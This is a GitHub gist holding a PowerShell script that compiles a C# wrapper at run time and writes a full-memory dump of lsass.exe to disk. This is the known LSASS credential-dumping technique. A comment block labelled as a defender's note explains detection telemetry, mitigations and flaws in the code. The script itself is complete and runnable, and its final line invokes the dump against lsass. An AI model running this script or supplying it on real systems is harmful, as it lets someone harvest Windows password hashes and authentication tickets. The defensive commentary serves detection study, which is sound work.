@FrankSpierings
Last active June 21, 2022 09:45
Dump lsass.exe memory
# Defender's note: this script compiles a small C# P/Invoke wrapper (class MiniDump)
# at run time and writes a full-memory minidump (MiniDumpWithFullMemory = 0x2) of an
# arbitrary process to disk. The invocation at the bottom targets lsass.exe, i.e. this
# is the well-known LSASS credential-dumping technique (MITRE ATT&CK T1003.001).
# Telemetry that catches it: process-access events on lsass.exe whose granted access
# includes PROCESS_VM_READ (e.g. Sysmon Event ID 10, EDR lsass-access sensors), plus the
# loading of dbghelp.dll / MiniDumpWriteDump by an unexpected process. Mitigations:
# LSA Protection (RunAsPPL) and Credential Guard, under which OpenProcess with
# PROCESS_VM_READ on lsass fails for a non-protected caller.
#
# What MiniDump.Main does, as written:
#   - args[0] is the target PID; Convert.ToUInt32 throws FormatException on a
#     non-numeric value rather than printing a usage message.
#   - args[1] is the output path; when it is absent Path.GetTempFileName() places the
#     unencrypted dump in %TEMP%.
#   - reqAccess = 0x450 is PROCESS_DUP_HANDLE (0x40) | PROCESS_QUERY_INFORMATION (0x400)
#     | PROCESS_VM_READ (0x10), exactly as the inline comment says.
#   - The OpenProcess return value is never checked, so a NULL handle (access denied,
#     protected process) is passed straight to MiniDumpWriteDump and the Win32 error
#     printed afterwards is the one left by MiniDumpWriteDump, not by OpenProcess.
#   - The process handle is never released (no CloseHandle), and fs.Close() is not in a
#     finally block, so an exception from the P/Invoke call leaks the FileStream.
#   - File.OpenWrite does not truncate: if the output file already exists and is longer
#     than the dump, bytes past the dump's end are left in place.
$code = @"
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.IO;
public class MiniDump
{
// PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ
static uint reqAccess = 0x00000450;
static uint MiniDumpWithFullMemory = 0x00000002;
[DllImport("dbghelp.dll", SetLastError=true)]
public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, SafeHandle hFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
public static void Main(string[] args)
{
if (args.Length < 1) {
Console.WriteLine("PID required!");
return;
}
uint pid = Convert.ToUInt32(args[0]);
string path = "";
if (args.Length < 2) {
path = Path.GetTempFileName();
}
else {
path = args[1];
}
Console.WriteLine(String.Format("Using: {0}", path));
IntPtr hProcess = OpenProcess(reqAccess, false, pid);
FileStream fs = File.OpenWrite(path);
bool result = MiniDumpWriteDump(hProcess, pid, fs.SafeFileHandle, MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
if (!result) {
Console.WriteLine(new Win32Exception(Marshal.GetLastWin32Error()).Message);
}
else {
Console.WriteLine("Success");
}
fs.Close();
}
}
"@;
# Add-Type with source text compiles at run time; on Windows PowerShell this is itself a
# detection point (a C# compiler child process and temporary source/assembly files under
# %TEMP%), separate from the lsass access that follows.
Add-Type -Language CSharp $code
# [MiniDump]::Main(((Get-Process -Name lsass)[0].Id, "C:\temp\lsass.exe.dmp"))
# A single Int32 is passed; PowerShell's argument conversion turns the scalar into the
# one-element string[] that Main expects, so the dump lands in %TEMP% (no args[1]).
[MiniDump]::Main(((Get-Process -Name lsass)[0].Id))